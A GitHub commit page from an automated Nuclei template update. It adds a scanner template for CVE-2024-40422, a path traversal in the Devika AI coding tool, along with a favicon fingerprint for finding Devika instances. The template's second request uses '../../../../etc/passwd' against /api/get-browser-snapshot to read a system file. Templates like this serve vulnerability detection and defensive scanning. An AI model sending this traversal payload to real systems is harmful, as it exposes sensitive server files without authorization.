Skip to content

Commit

Permalink
Auto Update Nuclei [Fri Aug 9 01:16:36 UTC 2024] :robot:
Browse files Browse the repository at this point in the history
  • Loading branch information
actions-user committed Aug 9, 2024
1 parent 2fe7678 commit 81fe54c
Show file tree
Hide file tree
Showing 3 changed files with 87 additions and 1 deletion.
2 changes: 1 addition & 1 deletion plugins/apache/ofbiz/CVE-2024-38856.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -19,7 +19,7 @@ info:
verified: true
max-request: 1
fofa-query: app="Apache_OFBiz"
tags: cve,cve2024,ofbiz,apache,rce
tags: cve,cve2024,ofbiz,apache,rce,kev

http:
- raw:
Expand Down
66 changes: 66 additions & 0 deletions plugins/stitionai/devika/CVE-2024-40422.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,66 @@
id: CVE-2024-40422

info:
name: Devika v1 - Path Traversal
author: securityforeveryone,alpernae
severity: critical
description: |
The snapshot_path parameter in the /api/get-browser-snapshot endpoint in stitionai devika v1 is susceptible to a path traversal attack. An attacker can manipulate the snapshot_path parameter to traverse directories and access sensitive files on the server. This can potentially lead to unauthorized access to critical system files and compromise the confidentiality and integrity of the system.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-40422
- https://cvefeed.io/vuln/detail/CVE-2024-40422
- https://github.com/alpernae/CVE-2024-40422
- https://github.com/stitionai/devika
- https://www.exploit-db.com/exploits/52066
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2024-40422
cwe-id: CWE-22
epss-score: 0.0087
epss-percentile: 0.82513
cpe: cpe:2.3:a:stitionai:devika:1.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: stitionai
product: devika
fofa-query: icon_hash="-1429839495"
tags: cve,cve2024,devika,lfi

flow: http(1) && http(2)

http:
- raw:
- |
GET /api/data HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body,"models","projects","OPENAI","OLLAMA")'
- 'contains(content_type,"application/json")'
- 'status_code == 200'
condition: and
internal: true

- raw:
- |
GET /api/get-browser-snapshot?snapshot_path=../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'root:.*:0:0:'

- type: word
part: header
words:
- 'application/octet-stream'

- type: status
status:
- 200
20 changes: 20 additions & 0 deletions web-fingerprint/stitionai/devika.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,20 @@
id: devika
info:
name: devika
author: cn-kali-team
tags: detect,tech,devika
severity: info
metadata:
fofa-query:
- icon_hash="-1429839495"
product: devika
vendor: stitionai
verified: true
http:
- method: GET
path:
- '{{BaseURL}}/'
matchers:
- type: favicon
hash:
- '-1429839495'

0 comments on commit 81fe54c

Please sign in to comment.